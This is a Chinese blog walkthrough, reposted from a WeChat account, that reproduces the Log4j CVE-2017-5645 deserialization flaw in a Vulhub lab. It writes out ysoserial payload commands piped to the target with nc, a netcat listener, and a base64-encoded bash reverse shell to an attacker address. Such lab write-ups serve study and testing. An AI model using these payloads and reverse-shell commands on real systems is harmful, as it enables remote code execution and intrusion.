漏洞复现——CVE-2017-5645

admin 2022年11月9日00:25:12评论68 views字数 1100阅读3分40秒阅读模式

免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

漏洞概述

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

环境搭建

Vulhub搭建参考如下:

Vulnhub 靶场环境搭建

进入到vulbub靶场的/vulhub/log4j/CVE-2017-5645目录

使用命令:docker-compose up -d #启动镜像,整个过程比较久,耐心等待

漏洞复现——CVE-2017-5645

测试连通性

漏洞复现——CVE-2017-5645

进入容器

docker-compose exec log4j bashls /tmp 查看当前文件情况,用于后续确认远程命令执行是否执行成功

生成payload进行攻击

使用ysoserial生成payload,然后直接发送给192.168.0.140:4712

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc.exe 192.168.0.140 4712

通过docker命令行可以看到生成了success文件夹

漏洞复现——CVE-2017-5645

开启监听

nc.exe -lvvp 9999
将 /bin/bash -i >& /dev/tcp/192.168.0.1/9999 0>&1 进行base64编码L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xLzk5OTkgMD4mMQ==

反弹shell

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" | nc.exe 192.168.0.140 471

沉住气,不要急!!!

得到反弹shell,success

漏洞复现——CVE-2017-5645

获取exp

关注浪飒sec回复221108获取exp下载地址

漏洞复现——CVE-2017-5645

历史推荐

工具推荐——三个Burp插件

AK4安全工具集装箱V1.0.1正式发布

哈希碰撞与生日攻击

Ubuntu 20.04 离线安装破解 Nessus 10.3.0

浅析《数据安全法》与《个人信息保护法》对各行业的影响

内网渗透 域渗透

域环境基础知识

企业安全必看书籍(文末附地址)

超全Hack报告/资料/文档/书籍(不关注我你必后悔的好东西)

应急响应指南


原文始发于微信公众号(浪飒sec):漏洞复现——CVE-2017-5645

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月9日00:25:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现——CVE-2017-5645http://cn-sec.com/archives/1397712.html

发表评论

匿名网友 填写信息